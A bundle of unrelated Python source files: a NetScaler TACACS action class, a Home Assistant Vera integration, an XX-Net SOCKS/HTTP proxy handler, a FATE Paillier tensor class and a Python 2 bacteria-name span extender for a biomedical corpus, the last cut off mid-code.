def count_filtered(cls, client, filter_) :
""" Use this API to count filtered the set of authenticationtacacsaction resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = authenticationtacacsaction()
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
class Auditfailedcmds:
ON = "ON"
OFF = "OFF"
class Authorization:
ON = "ON"
OFF = "OFF"
class Accounting:
ON = "ON"
OFF = "OFF"
class authenticationtacacsaction_response(base_response) :
def __init__(self, length=1) :
self.authenticationtacacsaction = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.authenticationtacacsaction = [authenticationtacacsaction() for _ in range(length)]
|
|
"""Support for Vera devices."""
import asyncio
from collections import defaultdict
import logging
from typing import Any, Dict, Generic, List, Optional, Type, TypeVar
import pyvera as veraApi
from requests.exceptions import RequestException
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
ATTR_ARMED,
ATTR_BATTERY_LEVEL,
ATTR_LAST_TRIP_TIME,
ATTR_TRIPPED,
CONF_EXCLUDE,
CONF_LIGHTS,
EVENT_HOMEASSISTANT_STOP,
)
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import ConfigEntryNotReady
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.entity import Entity
from homeassistant.util import convert, slugify
from homeassistant.util.dt import utc_from_timestamp
from .common import (
ControllerData,
SubscriptionRegistry,
get_configured_platforms,
get_controller_data,
set_controller_data,
)
from .config_flow import fix_device_id_list, new_options
from .const import (
ATTR_CURRENT_ENERGY_KWH,
ATTR_CURRENT_POWER_W,
CONF_CONTROLLER,
CONF_LEGACY_UNIQUE_ID,
DOMAIN,
VERA_ID_FORMAT,
)
_LOGGER = logging.getLogger(__name__)
VERA_ID_LIST_SCHEMA = vol.Schema([int])
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Required(CONF_CONTROLLER): cv.url,
vol.Optional(CONF_EXCLUDE, default=[]): VERA_ID_LIST_SCHEMA,
vol.Optional(CONF_LIGHTS, default=[]): VERA_ID_LIST_SCHEMA,
}
)
},
extra=vol.ALLOW_EXTRA,
)
async def async_setup(hass: HomeAssistant, base_config: dict) -> bool:
"""Set up for Vera controllers."""
hass.data[DOMAIN] = {}
config = base_config.get(DOMAIN)
if not config:
return True
hass.async_create_task(
hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data=config,
)
)
return True
async def async_setup_entry(hass: HomeAssistant, config_entry: ConfigEntry) -> bool:
"""Do setup of vera."""
# Use options entered during initial config flow or provided from configuration.yml
if config_entry.data.get(CONF_LIGHTS) or config_entry.data.get(CONF_EXCLUDE):
hass.config_entries.async_update_entry(
entry=config_entry,
data=config_entry.data,
options=new_options(
config_entry.data.get(CONF_LIGHTS, []),
config_entry.data.get(CONF_EXCLUDE, []),
),
)
saved_light_ids = config_entry.options.get(CONF_LIGHTS, [])
saved_exclude_ids = config_entry.options.get(CONF_EXCLUDE, [])
base_url = config_entry.data[CONF_CONTROLLER]
light_ids = fix_device_id_list(saved_light_ids)
exclude_ids = fix_device_id_list(saved_exclude_ids)
# If the ids were corrected. Update the config entry.
if light_ids != saved_light_ids or exclude_ids != saved_exclude_ids:
hass.config_entries.async_update_entry(
entry=config_entry, options=new_options(light_ids, exclude_ids)
)
# Initialize the Vera controller.
subscription_registry = SubscriptionRegistry(hass)
controller = veraApi.VeraController(base_url, subscription_registry)
try:
all_devices = await hass.async_add_executor_job(controller.get_devices)
all_scenes = await hass.async_add_executor_job(controller.get_scenes)
except RequestException as exception:
# There was a network related error connecting to the Vera controller.
_LOGGER.exception("Error communicating with Vera API")
raise ConfigEntryNotReady from exception
# Exclude devices unwanted by user.
devices = [device for device in all_devices if device.device_id not in exclude_ids]
vera_devices = defaultdict(list)
for device in devices:
device_type = map_vera_device(device, light_ids)
if device_type is not None:
vera_devices[device_type].append(device)
vera_scenes = []
for scene in all_scenes:
vera_scenes.append(scene)
controller_data = ControllerData(
controller=controller,
devices=vera_devices,
scenes=vera_scenes,
config_entry=config_entry,
)
set_controller_data(hass, config_entry, controller_data)
# Forward the config data to the necessary platforms.
for platform in get_configured_platforms(controller_data):
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(config_entry, platform)
)
def stop_subscription(event):
"""Stop SubscriptionRegistry updates."""
controller.stop()
await hass.async_add_executor_job(controller.start)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, stop_subscription)
return True
async def async_unload_entry(hass: HomeAssistant, config_entry: ConfigEntry) -> bool:
"""Unload Withings config entry."""
controller_data: ControllerData = get_controller_data(hass, config_entry)
tasks = [
hass.config_entries.async_forward_entry_unload(config_entry, platform)
for platform in get_configured_platforms(controller_data)
]
tasks.append(hass.async_add_executor_job(controller_data.controller.stop))
await asyncio.gather(*tasks)
return True
def map_vera_device(vera_device: veraApi.VeraDevice, remap: List[int]) -> str:
"""Map vera classes to Home Assistant types."""
type_map = {
veraApi.VeraDimmer: "light",
veraApi.VeraBinarySensor: "binary_sensor",
veraApi.VeraSensor: "sensor",
veraApi.VeraArmableDevice: "switch",
veraApi.VeraLock: "lock",
veraApi.VeraThermostat: "climate",
veraApi.VeraCurtain: "cover",
veraApi.VeraSceneController: "sensor",
veraApi.VeraSwitch: "switch",
}
def map_special_case(instance_class: Type, entity_type: str) -> str:
if instance_class is veraApi.VeraSwitch and vera_device.device_id in remap:
return "light"
return entity_type
return next(
iter(
map_special_case(instance_class, entity_type)
for instance_class, entity_type in type_map.items()
if isinstance(vera_device, instance_class)
),
None,
)
DeviceType = TypeVar("DeviceType", bound=veraApi.VeraDevice)
class VeraDevice(Generic[DeviceType], Entity):
"""Representation of a Vera device entity."""
def __init__(self, vera_device: DeviceType, controller_data: ControllerData):
"""Initialize the device."""
self.vera_device = vera_device
self.controller = controller_data.controller
self._name = self.vera_device.name
# Append device id to prevent name clashes in HA.
self.vera_id = VERA_ID_FORMAT.format(
slugify(vera_device.name), vera_device.vera_device_id
)
if controller_data.config_entry.data.get(CONF_LEGACY_UNIQUE_ID):
self._unique_id = str(self.vera_device.vera_device_id)
else:
self._unique_id = f"vera_{controller_data.config_entry.unique_id}_{self.vera_device.vera_device_id}"
async def async_added_to_hass(self) -> None:
"""Subscribe to updates."""
self.controller.register(self.vera_device, self._update_callback)
def _update_callback(self, _device: DeviceType) -> None:
"""Update the state."""
self.schedule_update_ha_state(True)
def update(self):
"""Force a refresh from the device if the device is unavailable."""
if not self.available:
self.vera_device.refresh()
@property
def name(self) -> str:
"""Return the name of the device."""
return self._name
@property
def should_poll(self) -> bool:
"""Get polling requirement from vera device."""
return self.vera_device.should_poll
@property
def device_state_attributes(self) -> Optional[Dict[str, Any]]:
"""Return the state attributes of the device."""
attr = {}
if self.vera_device.has_battery:
attr[ATTR_BATTERY_LEVEL] = self.vera_device.battery_level
if self.vera_device.is_armable:
armed = self.vera_device.is_armed
attr[ATTR_ARMED] = "True" if armed else "False"
if self.vera_device.is_trippable:
last_tripped = self.vera_device.last_trip
if last_tripped is not None:
utc_time = utc_from_timestamp(int(last_tripped))
attr[ATTR_LAST_TRIP_TIME] = utc_time.isoformat()
else:
attr[ATTR_LAST_TRIP_TIME] = None
tripped = self.vera_device.is_tripped
attr[ATTR_TRIPPED] = "True" if tripped else "False"
power = self.vera_device.power
if power:
attr[ATTR_CURRENT_POWER_W] = convert(power, float, 0.0)
energy = self.vera_device.energy
if energy:
attr[ATTR_CURRENT_ENERGY_KWH] = convert(energy, float, 0.0)
attr["Vera Device Id"] = self.vera_device.vera_device_id
return attr
@property
def available(self):
"""If device communications have failed return false."""
return not self.vera_device.comm_failure
@property
def unique_id(self) -> str:
"""Return a unique ID.
The Vera assigns a unique and immutable ID number to each device.
"""
return self._unique_id
|
|
import time
import socket
import struct
import urlparse
import select
import utils
from xlog import getLogger
xlog = getLogger("x_tunnel")
import global_var as g
import proxy_session
def netloc_to_host_port(netloc, default_port=80):
if ":" in netloc:
host, _, port = netloc.rpartition(':')
port = int(port)
else:
host = netloc
port = default_port
return host, port
class Socks5Server():
handle_num = 0
def __init__(self, sock, client, args):
self.connection = sock
self.rfile = socket._fileobject(self.connection, "rb", -1)
self.wfile = socket._fileobject(self.connection, "wb", 0)
self.client_address = client
self.read_buffer = ""
self.buffer_start = 0
self.args = args
def handle(self):
self.__class__.handle_num += 1
try:
r, w, e = select.select([self.connection], [], [])
socks_version = self.read_bytes(1)
if not socks_version:
return
if socks_version == "\x04":
self.socks4_handler()
elif socks_version == "\x05":
self.socks5_handler()
elif socks_version == "C":
self.https_handler()
elif socks_version in ["G", "P", "D", "O", "H", "T"]:
self.http_handler(socks_version)
return
else:
xlog.warn("socks version:%s not supported", utils.str2hex(socks_version))
return
except socket.error as e:
xlog.debug('socks handler read error %r', e)
return
except Exception as e:
xlog.exception("any err:%r", e)
def read_null_end_line(self):
sock = self.connection
sock.setblocking(0)
try:
while True:
n1 = self.read_buffer.find("\x00", self.buffer_start)
if n1 > -1:
line = self.read_buffer[self.buffer_start:n1]
self.buffer_start = n1 + 1
return line
try:
data = sock.recv(8192)
except socket.error as e:
# logging.exception("e:%r", e)
if e.errno in [2, 11, 10035]:
time.sleep(0.01)
continue
else:
raise e
self.read_buffer += data
finally:
sock.setblocking(1)
def read_crlf_line(self):
sock = self.connection
sock.setblocking(0)
try:
while True:
n1 = self.read_buffer.find("\r\n", self.buffer_start)
if n1 > -1:
line = self.read_buffer[self.buffer_start:n1]
self.buffer_start = n1 + 2
return line
try:
data = sock.recv(8192)
except socket.error as e:
# logging.exception("e:%r", e)
if e.errno in [2, 11, 10035]:
time.sleep(0.01)
continue
else:
raise e
self.read_buffer += data
finally:
sock.setblocking(1)
def read_headers(self):
sock = self.connection
sock.setblocking(0)
try:
while True:
if self.read_buffer[self.buffer_start:] == "\r\n":
self.buffer_start += 2
return ""
n1 = self.read_buffer.find("\r\n\r\n", self.buffer_start)
if n1 > -1:
block = self.read_buffer[self.buffer_start:n1]
self.buffer_start = n1 + 4
return block
try:
data = sock.recv(8192)
except socket.error as e:
# logging.exception("e:%r", e)
if e.errno in [2, 11, 10035]:
time.sleep(0.01)
continue
else:
raise e
self.read_buffer += data
finally:
sock.setblocking(1)
def read_bytes(self, size):
sock = self.connection
sock.setblocking(1)
try:
while True:
left = len(self.read_buffer) - self.buffer_start
if left >= size:
break
need = size - left
try:
data = sock.recv(need)
except socket.error as e:
# logging.exception("e:%r", e)
if e.errno in [2, 11, 10035]:
time.sleep(0.01)
continue
else:
raise e
if len(data):
self.read_buffer += data
else:
raise socket.error("recv fail")
finally:
sock.setblocking(1)
data = self.read_buffer[self.buffer_start:self.buffer_start + size]
self.buffer_start += size
return data
def socks4_handler(self):
# Socks4 or Socks4a
sock = self.connection
cmd = ord(self.read_bytes(1))
if cmd != 1:
xlog.warn("Socks4 cmd:%d not supported", cmd)
return
data = self.read_bytes(6)
port = struct.unpack(">H", data[0:2])[0]
addr_pack = data[2:6]
if addr_pack[0:3] == '\x00\x00\x00' and addr_pack[3] != '\x00':
domain_mode = True
else:
ip = socket.inet_ntoa(addr_pack)
domain_mode = False
user_id = self.read_null_end_line()
if len(user_id):
xlog.debug("Socks4 user_id:%s", user_id)
if domain_mode:
addr = self.read_null_end_line()
else:
addr = ip
conn_id = proxy_session.create_conn(sock, addr, port)
if not conn_id:
xlog.warn("Socks4 connect fail, no conn_id")
reply = b"\x00\x5b\x00" + addr_pack + struct.pack(">H", port)
sock.send(reply)
return
xlog.info("Socks4:%r to %s:%d, conn_id:%d", self.client_address, addr, port, conn_id)
reply = b"\x00\x5a" + addr_pack + struct.pack(">H", port)
sock.send(reply)
if len(self.read_buffer) - self.buffer_start:
g.session.conn_list[conn_id].transfer_received_data(self.read_buffer[self.buffer_start:])
g.session.conn_list[conn_id].start(block=True)
def socks5_handler(self):
sock = self.connection
auth_mode_num = ord(self.read_bytes(1))
data = self.read_bytes(auth_mode_num)
sock.send(b"\x05\x00") # socks version 5, no auth needed.
try:
data = self.read_bytes(4)
except Exception as e:
xlog.debug("socks5 auth num:%d, list:%s", auth_mode_num, utils.str2hex(data))
xlog.warn("socks5 protocol error:%r", e)
return
socks_version = ord(data[0])
if socks_version != 5:
xlog.warn("request version:%d error", socks_version)
return
command = ord(data[1])
if command != 1: # 1. Tcp connect
xlog.warn("request not supported command mode:%d", command)
sock.send(b"\x05\x07\x00\x01") # Command not supported
return
addrtype_pack = data[3]
addrtype = ord(addrtype_pack)
if addrtype == 1: # IPv4
addr_pack = self.read_bytes(4)
addr = socket.inet_ntoa(addr_pack)
elif addrtype == 3: # Domain name
domain_len_pack = self.read_bytes(1)[0]
domain_len = ord(domain_len_pack)
domain = self.read_bytes(domain_len)
addr_pack = domain_len_pack + domain
addr = domain
elif addrtype == 4: # IPv6
addr_pack = self.read_bytes(16)
addr = socket.inet_ntop(socket.AF_INET6, addr_pack)
else:
xlog.warn("request address type unknown:%d", addrtype)
sock.send(b"\x05\x07\x00\x01") # Command not supported
return
port = struct.unpack('>H', self.rfile.read(2))[0]
conn_id = proxy_session.create_conn(sock, addr, port)
if not conn_id:
xlog.warn("create conn fail")
reply = b"\x05\x01\x00" + addrtype_pack + addr_pack + struct.pack(">H", port)
sock.send(reply)
return
xlog.info("socks5 %r connect to %s:%d conn_id:%d", self.client_address, addr, port, conn_id)
reply = b"\x05\x00\x00" + addrtype_pack + addr_pack + struct.pack(">H", port)
sock.send(reply)
if len(self.read_buffer) - self.buffer_start:
g.session.conn_list[conn_id].transfer_received_data(self.read_buffer[self.buffer_start:])
g.session.conn_list[conn_id].start(block=True)
def https_handler(self):
line = self.read_crlf_line()
line = line.decode('iso-8859-1')
words = line.split()
if len(words) == 3:
command, path, version = words
elif len(words) == 2:
command, path = words
version = "HTTP/1.1"
else:
xlog.warn("https req line fail:%s", line)
return
if command != "ONNECT":
xlog.warn("https req line fail:%s", line)
return
host, _, port = path.rpartition(':')
host = host.encode()
port = int(port)
header_block = self.read_headers()
sock = self.connection
conn_id = proxy_session.create_conn(sock, host, port)
if not conn_id:
xlog.warn("create conn fail")
sock.send(b'HTTP/1.1 500 Fail\r\n\r\n')
return
xlog.info("https %r connect to %s:%d conn_id:%d", self.client_address, host, port, conn_id)
try:
sock.send(b'HTTP/1.1 200 OK\r\n\r\n')
except:
xlog.warn("https %r connect to %s:%d conn_id:%d closed.", self.client_address, host, port, conn_id)
if (len(self.read_buffer) - self.buffer_start) > 0:
g.session.conn_list[conn_id].transfer_received_data(self.read_buffer[self.buffer_start:])
g.session.conn_list[conn_id].start(block=True)
def http_handler(self, first_char):
req_line = self.read_crlf_line()
words = req_line.split()
if len(words) == 3:
method, url, http_version = words
elif len(words) == 2:
method, url = words
http_version = "HTTP/1.1"
else:
xlog.warn("http req line fail:%s", req_line)
return
method = first_char + method
# if method not in ["GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE", "PATCH"]:
# xlog.warn("https req method not known:%s", method)
if url.startswith("http://") or url.startswith("HTTP://"):
o = urlparse.urlparse(url)
host, port = netloc_to_host_port(o.netloc)
p = url[7:].find("/")
if p >= 0:
path = url[7+p:]
else:
path = "/"
else:
header_block = self.read_headers()
lines = header_block.split("\r\n")
path = url
host = None
for line in lines:
key, _, value = line.rpartition(":")
if key.lower == "host":
host, port = netloc_to_host_port(value)
break
if host is None:
xlog.warn("http proxy host can't parsed. %s %s", req_line, header_block)
self.connection.send(b'HTTP/1.1 500 Fail\r\n\r\n')
return
sock = self.connection
conn_id = proxy_session.create_conn(sock, host, port)
if not conn_id:
xlog.warn("create conn fail")
sock.send(b'HTTP/1.1 500 Fail\r\n\r\n')
return
xlog.info("http %r connect to %s:%d conn_id:%d", self.client_address, host, port, conn_id)
new_req_line = "%s %s %s" % (method, path, http_version)
left_buf = new_req_line + self.read_buffer[(len(req_line) + 1):]
g.session.conn_list[conn_id].transfer_received_data(left_buf)
g.session.conn_list[conn_id].start(block=True)
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
from federatedml.util import LOGGER
from fate_arch.session import computing_session
from fate_arch.abc import CTableABC
class PaillierTensor(object):
def __init__(self, obj, partitions=1):
if obj is None:
raise ValueError("Cannot convert None to Paillier tensor")
if isinstance(obj, (list, np.ndarray)):
self._ori_data = obj
self._partitions = partitions
self._obj = computing_session.parallelize(obj,
include_key=False,
partition=partitions)
elif isinstance(obj, CTableABC):
self._ori_data = None
self._partitions = obj.partitions
self._obj = obj
else:
raise ValueError(f"Cannot convert obj to Paillier tensor, object type is {type(obj)}")
LOGGER.debug("tensor's partition is {}".format(self._partitions))
def __add__(self, other):
if isinstance(other, PaillierTensor):
return PaillierTensor(self._obj.join(other._obj, lambda v1, v2: v1 + v2))
elif isinstance(other, CTableABC):
return PaillierTensor(self._obj.join(other, lambda v1, v2: v1 + v2))
elif isinstance(other, (np.ndarray, int, float)):
return PaillierTensor(self._obj.mapValues(lambda v: v + other))
else:
raise ValueError(f"Unrecognized type {type(other)}, dose not support subtraction")
def __radd__(self, other):
return self.__add__(other)
def __sub__(self, other):
if isinstance(other, PaillierTensor):
return PaillierTensor(self._obj.join(other._obj, lambda v1, v2: v1 - v2))
elif isinstance(other, CTableABC):
return PaillierTensor(self._obj.join(other, lambda v1, v2: v1 - v2))
elif isinstance(other, (np.ndarray, int, float)):
return PaillierTensor(self._obj.mapValues(lambda v: v - other))
else:
raise ValueError(f"Unrecognized type {type(other)}, dose not support subtraction")
def __rsub__(self, other):
return self.__sub__(other)
def __mul__(self, other):
if isinstance(other, (int, float)):
return PaillierTensor(self._obj.mapValues(lambda val: val * other))
elif isinstance(other, np.ndarray):
return PaillierTensor(self._obj.mapValues(lambda val: np.matmul(val, other)))
elif isinstance(other, CTableABC):
other = PaillierTensor(other)
return self.__mul__(other)
elif isinstance(other, PaillierTensor):
ret = self.numpy() * other.numpy()
return PaillierTensor(ret, partitions=max(self.partitions, other.partitions))
def matmul(self, other):
if isinstance(other, np.ndarray):
if len(other.shape) != 2:
raise ValueError("Only Support 2-D multiplication in matmul op, "
"if you want to do 3-D, use fast_multiply_3d")
return self.fast_matmul_2d(other)
def multiply(self, other):
if isinstance(other, np.ndarray):
if other.shape != self.shape:
raise ValueError(f"operands could not be broadcast together with shapes {self.shape} {other.shape}")
rhs = PaillierTensor(other)
return PaillierTensor(self.multiply(rhs))
elif isinstance(other, CTableABC):
other = PaillierTensor(other)
return self.multiply(other)
elif isinstance(other, PaillierTensor):
return PaillierTensor(self._obj.join(other._obj, lambda v1, v2: v1 * v2))
else:
raise ValueError(f"Not support type in multiply op {type(other)}")
@property
def T(self):
if self._ori_data is None:
self._ori_data = self.numpy()
new_data = self._ori_data.T
return PaillierTensor(new_data, self.partitions)
@property
def partitions(self):
return self._partitions
def get_obj(self):
return self._obj
@property
def shape(self):
if self._ori_data is not None:
return self._ori_data.shape
else:
first_dim = self._obj.count()
second_dim = self._obj.first()[1].shape
return tuple([first_dim] + list(second_dim))
def mean(self, axis=-1):
if axis == -1:
size = 1
for shape in self._ori_data.shape:
size *= shape
if not size:
raise ValueError("shape of data is zero, it should be positive")
return self._obj.mapValues(lambda val: np.sum(val)).reduce(lambda val1, val2: val1 + val2) / size
else:
ret_obj = self._obj.mapValues(lambda val: np.mean(val, axis - 1))
return PaillierTensor(ret_obj)
def reduce_sum(self):
return self._obj.reduce(lambda t1, t2: t1 + t2)
def map_ndarray_product(self, other):
if isinstance(other, np.ndarray):
return PaillierTensor(self._obj.mapValues(lambda val: val * other))
else:
raise ValueError('only support numpy array')
def numpy(self):
if self._ori_data is not None:
return self._ori_data
arr = [None for i in range(self._obj.count())]
for k, v in self._obj.collect():
arr[k] = v
self._ori_data = np.array(arr, dtype=arr[0].dtype)
return self._ori_data
def encrypt(self, encrypt_tool):
return PaillierTensor(encrypt_tool.encrypt(self._obj))
def decrypt(self, decrypt_tool):
return PaillierTensor(self._obj.mapValues(lambda val: decrypt_tool.recursive_decrypt(val)))
def encode(self, encoder):
return PaillierTensor(self._obj.mapValues(lambda val: encoder.encode(val)))
def decode(self, decoder):
return PaillierTensor(self._obj.mapValues(lambda val: decoder.decode(val)))
@staticmethod
def _vector_mul(kv_iters):
ret_mat = None
for k, v in kv_iters:
tmp_mat = np.outer(v[0], v[1])
if ret_mat is not None:
ret_mat += tmp_mat
else:
ret_mat = tmp_mat
return ret_mat
def fast_matmul_2d(self, other):
"""
Matrix multiplication between two matrix, please ensure that self's shape is (m, n) and other's shape is (m, k)
Their result is a matrix of (n, k)
"""
if isinstance(other, np.ndarray):
mat_tensor = PaillierTensor(other, partitions=self.partitions)
return self.fast_matmul_2d(mat_tensor)
if isinstance(other, CTableABC):
other = PaillierTensor(other)
func = self._vector_mul
ret_mat = self._obj.join(other.get_obj(), lambda vec1, vec2: (vec1, vec2)).applyPartitions(func).reduce(
lambda mat1, mat2: mat1 + mat2)
return ret_mat
def matmul_3d(self, other, multiply='left'):
assert multiply in ['left', 'right']
if isinstance(other, PaillierTensor):
mat = other
elif isinstance(other, CTableABC):
mat = PaillierTensor(other)
elif isinstance(other, np.ndarray):
mat = PaillierTensor(other, partitions=self.partitions)
else:
raise ValueError('only support numpy array and Paillier Tensor')
if multiply == 'left':
return PaillierTensor(self._obj.join(mat._obj, lambda val1, val2: np.tensordot(val1, val2, (1, 0))),
partitions=self._partitions)
if multiply == 'right':
return PaillierTensor(mat._obj.join(self._obj, lambda val1, val2: np.tensordot(val1, val2, (1, 0))),
partitions=self._partitions)
def element_wise_product(self, other):
if isinstance(other, np.ndarray):
mat = PaillierTensor(other, partitions=self.partitions)
elif isinstance(other, CTableABC):
mat = PaillierTensor(other)
else:
mat = other
return PaillierTensor(self._obj.join(mat._obj, lambda val1, val2: val1 * val2))
def squeeze(self, axis):
if axis == 0:
return PaillierTensor(list(self._obj.collect())[0][1], partitions=self.partitions)
else:
return PaillierTensor(self._obj.mapValues(lambda val: np.squeeze(val, axis=axis - 1)))
def select_columns(self, select_table):
return PaillierTensor(self._obj.join(select_table, lambda v1, v2: v1[v2]))
|
|
import sys, os
try:
import xml.etree.cElementTree as ET
except ImportError:
import cElementTree as ET
sys.path.append(os.path.dirname(os.path.abspath(__file__))+"/../..")
import Utils.ElementTreeUtils as ETUtils
import Utils.Range as Range
from collections import defaultdict
import ExampleBuilders.PhraseTriggerExampleBuilder
def tokenize(text):
tokens = [""]
inText = False
for c in text:
if c.isspace():
if inText:
tokens.append(c)
inText = False
else:
tokens[-1] += c
else: # text
if inText:
tokens[-1] += c
else:
tokens.append(c)
inText = True
if tokens[0] == "" and len(tokens) > 1:
return tokens[1:]
else:
return tokens
def isExtraWord(token, toLower=True, relPos = None):
if token[-1] == ".":
token = token[:-1]
if toLower:
token = token.lower()
if token in ["heliothrix", "caldicellulosiruptor"]:
return True
if token == "genus":
return True
if token == "bacterium":
return True
if token == "bacteria":
return True
elif token == "strain":
return True
elif token == "organisms":
return True
elif token == "fetus":
return True
elif token == "venerealis":
return True
elif token == "subsp":
return True
elif token == "subspecies":
return True
elif token == "ssp":
return True
elif token == "-like":
return True
elif token == "sp":
return True
#elif token == "species":
# return True
elif token == "serotope":
return True
elif token == "psjn":
return True
#elif token == "phylum":
# return True
return False
def isBacteriaToken(token, bacteriaTokens, relPos):
while len(token) > 0 and not token[0].isalnum():
token = token[1:]
if relPos > 0:
while len(token) > 0 and token[-1] == ")":
token = token[:-1]
# E., Y. etc.
if len(token) == 2 and token[0].isupper() and token[1] == ".":
return True
# Chl. ja Cfl.
if len(token) == 4 and token[0].isupper() and token[-1] == "." and token[1:3].islower():
return True
if len(token) == 0: return False
if token[-1] == ".":
token = token[:-1]
if len(token) == 0: return False
if token[-1] == ",":
return False
if relPos < 0: # no commas before head
return False
else:
token = token[:-1]
if len(token) == 0: return False
tokenLower = token.lower()
if tokenLower in bacteriaTokens:
return True
for split in tokenLower.split("-"):
if split in bacteriaTokens:
return True
for split in tokenLower.split("/"):
if split in bacteriaTokens:
return True
if token == "JIP":
return True
if tokenLower.endswith("lla"):
return True
elif tokenLower.endswith("ica"):
return True
elif tokenLower.endswith("us") and tokenLower != "thus":
return True
elif tokenLower.endswith("um") and tokenLower not in ["phylum"]:
return True
elif tokenLower.endswith("ans") and tokenLower != "humans":
return True
elif tokenLower.endswith("bacter"):
return True
elif tokenLower.endswith("is") and tokenLower not in ["is", "this"]:
return True
#elif tokenLower.endswith("es"):
# return True
elif tokenLower.endswith("ma"):
return True
elif tokenLower.endswith("ia"):
return True
elif tokenLower.endswith("ii"):
return True
elif tokenLower.endswith("li"):
return True
elif tokenLower.endswith("nii"):
return True
elif tokenLower.endswith("plasma"):
return True
elif tokenLower.endswith("plasmas"):
return True
elif tokenLower.endswith("ae"):
return True
elif tokenLower.endswith("ri"):
return True
elif tokenLower.endswith("ni"):
return True
if isExtraWord(token, toLower=True):
return True
isTrue = True
for c in token:
if c.isdigit() or c == "-" or c.isupper():
continue
else:
isTrue = False
break
if isTrue:
return True
return False
def extend(input, output=None, entityTypes=["Bacterium"], verbose=False):
if not (ET.iselement(input) and input.tag == "sentence"):
print >> sys.stderr, "Loading corpus file", input
corpusTree = ETUtils.ETFromObj(input)
corpusRoot = corpusTree.getroot()
bacteriaTokens = ExampleBuilders.PhraseTriggerExampleBuilder.getBacteriaTokens()
if not (ET.iselement(input) and input.tag == "sentence"):
sentences = corpusRoot.getiterator("sentence")
else:
sentences = [input]
counts = defaultdict(int)
for sentence in sentences:
incorrectCount = 0
sentenceText = sentence.get("text")
tokens = tokenize(sentenceText)
for entity in sentence.findall("entity"):
counts["all-entities"] += 1
if entity.get("type") not in entityTypes:
continue
headOffset = entity.get("headOffset")
if headOffset == None:
if verbose: print "WARNING, no head offset for entity", entity.get("id")
headOffset = entity.get("charOffset")
headOffset = Range.charOffsetToTuples(headOffset)[0]
charOffset = entity.get("charOffset")
assert charOffset != None, "WARNING, no head offset for entity " + str(entity.get("id"))
charOffset = Range.charOffsetToTuples(charOffset)[0]
tokPos = [0,0]
tokIndex = None
# find main token
for i in range(len(tokens)):
token = tokens[i]
tokPos[1] = tokPos[0] + len(token) # - 1
if Range.overlap(headOffset, tokPos):
tokIndex = i
break
tokPos[0] += len(token)
assert tokIndex != None, (entity.get("id"), entity.get("text"), tokens)
skip = False
if tokPos[0] < headOffset[0]:
tokPos = headOffset
skip = True
if not skip:
# Extend before
beginIndex = tokIndex
for i in range(tokIndex-1, -1, -1):
token = tokens[i]
if token.isspace():
continue
if not isBacteriaToken(token, bacteriaTokens, i - tokIndex):
beginIndex = i + 1
break
if i == 0:
beginIndex = i
while tokens[beginIndex].isspace() or isExtraWord(tokens[beginIndex], toLower=False):
beginIndex += 1
if beginIndex >= tokIndex:
beginIndex = tokIndex
break
# Extend after
endIndex = tokIndex
if tokens[tokIndex][-1] != ",":
endIndex = tokIndex
for i in range(tokIndex+1, len(tokens)):
token = tokens[i]
if token.isspace():
continue
if not isBacteriaToken(token, bacteriaTokens, i - tokIndex):
endIndex = i - 1
break
if i == len(tokens) - 1:
endIndex = i
while tokens[endIndex].isspace():
endIndex -= 1
# Modify range
if tokIndex > beginIndex:
for token in reversed(tokens[beginIndex:tokIndex]):
tokPos[0] -= len(token)
if tokIndex < endIndex:
for token in tokens[tokIndex+1:endIndex+1]:
tokPos[1] += len(token)
# Attempt to remove trailing periods and commas
while not sentenceText[tokPos[1] - 1].isalnum():
tokPos[1] -= 1
if tokPos[1] < tokPos[0] + 1:
tokPos[1] = tokPos[0] + 1
break
while not sentenceText[tokPos[0]].isalnum():
tokPos[0] += 1
if tokPos[0] >= tokPos[1]:
tokPos[0] = tokPos[1] - 1
break
# Split merged names
#newPos = [tokPos[0], tokPos[1]]
#for split in sentenceText[tokPos[0]:tokPos[1]+1].split("/"):
# newPos[0] += len(split)
# if
# Insert changed charOffset
counts["entities"] += 1
newOffset = tuple(tokPos)
newOffsetString = Range.tuplesToCharOffset([newOffset])
if verbose:
print "Entity", entity.get("id"),
#print [entity.get("text"), sentenceText[headOffset[0]:headOffset[1]+1], sentenceText[newOffset[0]:newOffset[1]+1]],
print [entity.get("text"), sentenceText[headOffset[0]:headOffset[1]], sentenceText[newOffset[0]:newOffset[1]]],
print [entity.get("charOffset"), entity.get("headOffset"), newOffsetString], "Sent:", len(sentence.get("text")),
if newOffset != headOffset:
counts["extended"] += 1
if verbose: print "EXTENDED",
if newOffset == charOffset:
counts["correct"] += 1
if verbose: print "CORRECT"
else:
counts["incorrect"] += 1
incorrectCount += 1
if verbose: print "INCORRECT"
entity.set("charOffset", newOffsetString)
#entity.set("text", sentenceText[newOffset[0]:newOffset[1]+1])
entity.set("text", sentenceText[newOffset[0]:newOffset[1]])
if incorrectCount > 0 and verbose:
print "TOKENS:", "|".join(tokens)
print "--------------------------------"
if verbose:
print counts
if not (ET.iselement(input) and input.tag == "sentence"):
if output != None:
print >> sys.stderr, "Writing output to", output
ETUtils.write(corpusRoot, output)
return corpusTree
if __name__=="__main__":
print >> sys.stderr, "##### Extend Triggers #####"
# Import Psyco if available
try:
import psyco
psyco.full()
print >> sys.stderr, "Found Psyco, using"
except ImportError:
